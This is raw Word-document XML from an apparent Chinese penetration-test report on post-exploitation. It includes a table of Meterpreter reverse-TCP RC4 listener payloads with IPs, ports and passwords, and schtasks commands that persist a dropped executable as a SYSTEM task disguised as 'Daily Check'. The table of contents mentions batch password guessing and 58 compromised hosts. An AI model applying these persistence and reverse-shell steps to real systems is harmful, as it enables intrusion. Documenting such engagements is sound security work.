        <w:instrText xml:space="preserve"> PAGEREF _Toc1875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_Toc7471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24.21.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ip.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7471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_Toc8485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24.21.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>探测</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc8485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_Toc25169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24.21.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25169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_Toc7829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24.21.2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7829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_Toc30110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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>批量密码猜测：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30110 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>48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_Toc27508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24.21.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存活探测：59个</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27508 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>48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_Toc32207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24.21.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>制作密码表：60个</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32207 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>48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_Toc32026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24.21.3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>制作目标：59个</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32026 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>48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_Toc26196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24.21.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始批量探测：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26196 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>48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_Toc5832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24.21.3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：27个，45%命中率</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5832 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>49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_Toc7347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24.21.3.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>抽查验证：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7347 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>49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_Toc29198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24.22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>失陷主机清单（总计58台）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29198 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>49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_Toc30167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24.22.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>失陷主机（入口）：1台</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30167 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>50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_Toc29533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24.22.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展失陷主机清单：57台</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29533 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>50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_Toc25305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 xml:space="preserve">24.23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入侵路径流程图：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25305 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>52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_Toc5166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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>附录一:入侵路径：</w:t>
      </w:r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 pdf版</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5166 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>53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_Toc6407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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>附录二:入侵路径：</w:t>
      </w:r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 xmind原件</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6407 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>53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\l _Toc14182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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>附录三:网段分区</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14182 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p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后渗透记录</w:t>
      </w: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0" w:name="_Toc4802"/>
      <w:bookmarkStart w:id="1" w:name="_Toc31523"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28327"/>
      <w:bookmarkStart w:id="3" w:name="_Toc19227"/>
      <w:bookmarkStart w:id="4" w:name="_Toc19263"/>
      <w:bookmarkStart w:id="5" w:name="_Toc27399"/>
      <w:bookmarkStart w:id="6" w:name="_Toc20064"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>监听载荷(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.xx.xx.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">:8090 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hxxxxdxxxxmxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="19"/>
        <w:tblW w:w="9888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14141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726"/>
        <w:gridCol w:w="2648"/>
        <w:gridCol w:w="1330"/>
        <w:gridCol w:w="218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14141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3681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windows/x64/meterpreter/reverse_tcp_rc4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2618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eastAsia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192.*.*.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300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6464</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139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RC4密码: lVbmZuji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14141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3681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windows/meterpreter/reverse_tcp_rc4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2618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eastAsia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192.*.*.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300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6666</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="303030" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="303030" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626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sz w:val="16"/>
                <w:szCs w:val="16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spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>RC4密码: nBBkUODQ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959485"/>
            <wp:effectExtent l="0" t="0" r="13970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7" w:name="_Toc32410"/>
      <w:bookmarkStart w:id="8" w:name="_Toc15846"/>
      <w:bookmarkStart w:id="9" w:name="_Toc18583"/>
      <w:bookmarkStart w:id="10" w:name="_Toc28022"/>
      <w:bookmarkStart w:id="11" w:name="_Toc4633"/>
      <w:bookmarkStart w:id="12" w:name="_Toc22959"/>
      <w:bookmarkStart w:id="13" w:name="_Toc6379"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13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14" w:name="_Toc14712"/>
      <w:bookmarkStart w:id="15" w:name="_Toc31197"/>
      <w:bookmarkStart w:id="16" w:name="_Toc24593"/>
      <w:bookmarkStart w:id="17" w:name="_Toc1057"/>
      <w:bookmarkStart w:id="18" w:name="_Toc27691"/>
      <w:bookmarkStart w:id="19" w:name="_Toc5969"/>
      <w:bookmarkStart w:id="20" w:name="_Toc8225"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看计划任务列表：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="2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|findstr -i "Daily Check"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1" w:name="_Toc26545"/>
      <w:bookmarkStart w:id="22" w:name="_Toc8468"/>
      <w:bookmarkStart w:id="23" w:name="_Toc8667"/>
      <w:bookmarkStart w:id="24" w:name="_Toc30889"/>
      <w:bookmarkStart w:id="25" w:name="_Toc31552"/>
      <w:bookmarkStart w:id="26" w:name="_Toc14731"/>
      <w:bookmarkStart w:id="27" w:name="_Toc32703"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="2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schtasks /query /TN "Daily Check"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本机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63085" cy="928370"/>
            <wp:effectExtent l="0" t="0" r="1079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8" w:name="_Toc29417"/>
      <w:bookmarkStart w:id="29" w:name="_Toc5680"/>
      <w:bookmarkStart w:id="30" w:name="_Toc8937"/>
      <w:bookmarkStart w:id="31" w:name="_Toc1471"/>
      <w:bookmarkStart w:id="32" w:name="_Toc25607"/>
      <w:bookmarkStart w:id="33" w:name="_Toc9074"/>
      <w:bookmarkStart w:id="34" w:name="_Toc11217"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终止计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34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/end /tn "Daily Check"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7845" cy="751840"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1016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5" w:name="_Toc14314"/>
      <w:bookmarkStart w:id="36" w:name="_Toc32066"/>
      <w:bookmarkStart w:id="37" w:name="_Toc12290"/>
      <w:bookmarkStart w:id="38" w:name="_Toc28519"/>
      <w:bookmarkStart w:id="39" w:name="_Toc17598"/>
      <w:bookmarkStart w:id="40" w:name="_Toc7798"/>
      <w:bookmarkStart w:id="41" w:name="_Toc18155"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="4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/run /tn "Daily Check"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0865" cy="554355"/>
            <wp:effectExtent l="0" t="0" r="8255" b="952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2" w:name="_Toc25434"/>
      <w:bookmarkStart w:id="43" w:name="_Toc24069"/>
      <w:bookmarkStart w:id="44" w:name="_Toc2517"/>
      <w:bookmarkStart w:id="45" w:name="_Toc9441"/>
      <w:bookmarkStart w:id="46" w:name="_Toc472"/>
      <w:bookmarkStart w:id="47" w:name="_Toc17623"/>
      <w:bookmarkStart w:id="48" w:name="_Toc29970"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>帮助</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="4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37865" cy="1872615"/>
            <wp:effectExtent l="0" t="0" r="8255" b="190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16125" cy="1793240"/>
            <wp:effectExtent l="0" t="0" r="10795" b="508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9" w:name="_Toc25724"/>
      <w:bookmarkStart w:id="50" w:name="_Toc21398"/>
      <w:bookmarkStart w:id="51" w:name="_Toc21454"/>
      <w:bookmarkStart w:id="52" w:name="_Toc17289"/>
      <w:bookmarkStart w:id="53" w:name="_Toc21745"/>
      <w:bookmarkStart w:id="54" w:name="_Toc31704"/>
      <w:bookmarkStart w:id="55" w:name="_Toc9397"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55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6" w:name="_Toc17797"/>
      <w:bookmarkStart w:id="57" w:name="_Toc6599"/>
      <w:bookmarkStart w:id="58" w:name="_Toc25341"/>
      <w:bookmarkStart w:id="59" w:name="_Toc15105"/>
      <w:bookmarkStart w:id="60" w:name="_Toc23200"/>
      <w:bookmarkStart w:id="61" w:name="_Toc12977"/>
      <w:bookmarkStart w:id="62" w:name="_Toc4716"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每分钟执行一次</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="6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/create /tn "Daily Check" /tr C:\Users\Administrator\Desktop\1668999741.exe  /sc minute /st 20:05:00 /ru "system"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解释：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/create:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>动作创建，还有/change修改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/tn "Daily Check" ：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">任务名，"Daily Check" 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/tr C:\Users\Administrator\Desktop\1668999741.exe：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指定运行程序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/sc minute ：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划每分钟执行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/st 20:05:00：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开始时间，20:05:00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/ru "system"：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用"system"权限运行任务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46805" cy="942340"/>
            <wp:effectExtent l="0" t="0" r="10795" b="254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3" w:name="_Toc10314"/>
      <w:bookmarkStart w:id="64" w:name="_Toc23507"/>
      <w:bookmarkStart w:id="65" w:name="_Toc7478"/>
      <w:bookmarkStart w:id="66" w:name="_Toc2488"/>
      <w:bookmarkStart w:id="67" w:name="_Toc13657"/>
      <w:bookmarkStart w:id="68" w:name="_Toc6491"/>
      <w:bookmarkStart w:id="69" w:name="_Toc26948"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每小时执行一次</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69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/create /tn "Daily Check" /tr C:\Users\Administrator\Desktop\1668999741.exe  /sc hourly /st 20:05:00 /ru "system"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0" w:name="_Toc6869"/>
      <w:bookmarkStart w:id="71" w:name="_Toc14784"/>
      <w:bookmarkStart w:id="72" w:name="_Toc14002"/>
      <w:bookmarkStart w:id="73" w:name="_Toc27543"/>
      <w:bookmarkStart w:id="74" w:name="_Toc23387"/>
      <w:bookmarkStart w:id="75" w:name="_Toc23998"/>
      <w:bookmarkStart w:id="76" w:name="_Toc3349"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改"Daily Check"为每一分钟执行一次</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76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/change /tn "Daily Check"   /ri 1</w:t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7" w:name="_Toc16742"/>
      <w:bookmarkStart w:id="78" w:name="_Toc14997"/>
      <w:bookmarkStart w:id="79" w:name="_Toc4639"/>
      <w:bookmarkStart w:id="80" w:name="_Toc3470"/>
      <w:bookmarkStart w:id="81" w:name="_Toc15083"/>
      <w:bookmarkStart w:id="82" w:name="_Toc11656"/>
      <w:bookmarkStart w:id="83" w:name="_Toc8612"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改计划任务为：指定日期指定时间运行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83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schtasks /change /tn "Daily Check"   /sd 2022/11/23  /st 08:50:00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20820" cy="759460"/>
            <wp:effectExtent l="0" t="0" r="254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84" w:name="_Toc13303"/>
      <w:bookmarkStart w:id="85" w:name="_Toc19434"/>
      <w:bookmarkStart w:id="86" w:name="_Toc13275"/>
      <w:bookmarkStart w:id="87" w:name="_Toc7765"/>
      <w:bookmarkStart w:id="88" w:name="_Toc10394"/>
      <w:bookmarkStart w:id="89" w:name="_Toc26624"/>
      <w:bookmarkStart w:id="90" w:name="_Toc29728"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="9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https://blog.csdn.net/baidu_24752135/article/details/125742688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https://blog.csdn.net/flyingleo1981/article/details/54405821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https://cloud.tencent.com/developer/article/1729689</w:t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91" w:name="_Toc11612"/>
      <w:bookmarkStart w:id="92" w:name="_Toc20048"/>
